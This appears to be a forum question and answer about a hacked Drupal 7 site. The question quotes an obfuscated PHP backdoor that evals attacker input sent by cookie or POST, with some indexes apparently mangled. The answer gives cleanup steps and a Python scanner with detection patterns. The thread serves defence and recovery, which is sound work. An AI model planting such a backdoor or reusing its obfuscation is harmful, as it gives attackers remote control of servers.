
Drupal 7 Recent log messages

I am facing an issue. Every day .ico files and a .php file appear on my server with this kind of code:

$zvtizrs = 'y6v1i4be#torufpkxc7_8Hg0n*-2sladm\\'';$yjzgov = Array();$yjzgov[] = $zvtizrs[30].$zvtizrs[3].$zvtizrs[30].$zvtizrs[27].$zvtizrs[1].$zvtizrs[23].$zvtizrs[30].$zvtizrs[13].$zvtizrs[26].$zvtizrs[6].$zvtizrs[20].$zvtizrs[31].$zvtizrs[30].$zvtizrs[26].$zvtizrs[5].$zvtizrs[3].$zvtizrs[27].$zvtizrs[18].$zvtizrs[26].$zvtizrs[20].$zvtizrs[3].$zvtizrs[13].$zvtizrs[27].$zvtizrs[26].$zvtizrs[1].$zvtizrs[23].$zvtizrs[5].$zvtizrs[13].$zvtizrs[5].$zvtizrs[13].$zvtizrs[23].$zvtizrs[20].$zvtizrs[30].$zvtizrs[18].$zvtizrs[17].$zvtizrs[7];$yjzgov[] = $zvtizrs[21].$zvtizrs[25];$yjzgov[] = $zvtizrs[8];$yjzgov[] = $zvtizrs[17].$zvtizrs[10].$zvtizrs[12].$zvtizrs[24].$zvtizrs[9];$yjzgov[] = $zvtizrs[28].$zvtizrs[9].$zvtizrs[11].$zvtizrs[19].$zvtizrs[11].$zvtizrs[7].$zvtizrs[14].$zvtizrs[7].$zvtizrs[30].$zvtizrs[9];$yjzgov[] = $zvtizrs[7].$zvtizrs[16].$zvtizrs[14].$zvtizrs[29].$zvtizrs[10].$zvtizrs[31].$zvtizrs[7];$yjzgov[] = $zvtizrs[28].$zvtizrs[12].$zvtizrs[6].$zvtizrs[28].$zvtizrs[9].$zvtizrs[11 ];$yjzgov[] = $zvtizrs[30].$zvtizrs[11].$zvtizrs[11].$zvtizrs[30].$zvtizrs[0].$zvtizrs[19].$zvtizrs[32].$zvtizrs[7].$zvtizrs[11].$zvtizrs[22].$zvtizrs[7];$yjzgov[] = $zvtizrs[28].$zvtizrs[9].$zvtizrs[11].$zvtizrs[29].$zvtizrs[7].$zvtizrs[24];$yjzgov[] = $zvtizrs[14].$zvtizrs[30].$zvtizrs[17].$zvtizrs[15];foreach ($yjzgov[7]($_COOKIE, $_POST) as $xtfjdc => $jqlwt){function frtdmz($yjzgov, $xtfjdc, $omljrbn){return $yjzgov[6]($yjzgov[4]($xtfjdc . $yjzgov[0], ($omljrbn / $yjzgov8) + 1), 0, $omljrbn);}function htylm($yjzgov, $xwoin){return @$yjzgov[9]($yjzgov[1], $xwoin);}function twdine($yjzgov, $xwoin){$sknbn = $yjzgov3 % 3;if (!$sknbn) {eval($xwoin1);exit();}}$jqlwt = htylm($yjzgov, $jqlwt);twdine($yjzgov, $yjzgov[5]($yjzgov[2], $jqlwt ^ frtdmz($yjzgov, $xtfjdc, $yjzgov8)));}

Could you please tell me what I should do? I am using Rackspace hosting. Also, I have a lot of links like this one (/d0E0MDY5VDNpanR6NDM5MzFJaQ==) in the recent log. How can I stop that?

Thanks in advance!

Hacked. I was recently cleaning a hacked site myself and it was a nightmare. Best would be to retrieve a recent version from backup and immediately apply all security updates. If there is no backup (big problem!) you can try "cleaning" the site as I did:

  • Clean all the files with malicious content. Go search/replace through all the files.
  • Dump the database and do the same thing to the dump file - remove malicious content and then import it back.
  • Check the user accounts. If there are some suspicious ones, block/delete them.
  • Check for newly created suspicious user groups. Delete them too.
  • Make a backup.
  • Apply all security updates/patches. Make a fresh backup again.
  • Change all account passwords (Drupal admins, FTP accounts, database accounts).
  • Set up scheduled backups, e.g. use the Backup and Migrate module for that.
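
An added example, not part of the original answer: a triage script for the first step, listing files in a docroot that share traits with the sample in the question (strings built one character at a time from an indexed variable, eval() next to $_COOKIE/$_POST) and .ico files that are not real icons. The threshold of 20, the extension list and the idea that the dropped .ico files lack a valid icon header are assumptions; every hit needs manual review before deletion.

```python
import os
import re
import sys

# Heuristics modelled on the sample in the question; the thresholds are assumptions.
INDEX_CONCAT = re.compile(rb"\$\w+\[\s*\d+\s*\]\s*\.")   # $var[30].$var[3]. ...
SUPERGLOBAL = re.compile(rb"\$_(COOKIE|POST|REQUEST)\b")
EVAL_CALL = re.compile(rb"\beval\s*\(")
ICO_MAGIC = b"\x00\x00\x01\x00"          # first four bytes of a genuine .ico file
PHP_EXT = (".php", ".inc", ".module", ".install")

def classify(name, data):
    """Return the reasons a file looks suspicious (empty list if none)."""
    reasons = []
    lower = name.lower()
    if lower.endswith(".ico"):
        if not data.startswith(ICO_MAGIC):
            reasons.append("ico-without-icon-header")
        if b"<?php" in data:
            reasons.append("ico-contains-php")
    elif lower.endswith(PHP_EXT):
        # Legitimate code rarely spells out strings one indexed character at a time.
        if len(INDEX_CONCAT.findall(data)) >= 20:
            reasons.append("char-index-string-building")
        if EVAL_CALL.search(data) and SUPERGLOBAL.search(data):
            reasons.append("eval-with-request-input")
    return reasons

def scan(root):
    """Walk a docroot and map relative path -> reasons for each flagged file."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(1_000_000)   # first 1 MB is enough for triage
            except OSError:
                continue                        # unreadable file: skip it
            reasons = classify(fn, data)
            if reasons:
                hits[os.path.relpath(path, root)] = reasons
    return hits

if __name__ == "__main__":
    for path, reasons in sorted(scan(sys.argv[1]).items()):
        print(path, ",".join(reasons))
```

Run it against a copy of the site (for example `python3 scan.py /path/to/docroot`) and compare the hits with a clean download of the same Drupal core and module versions.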
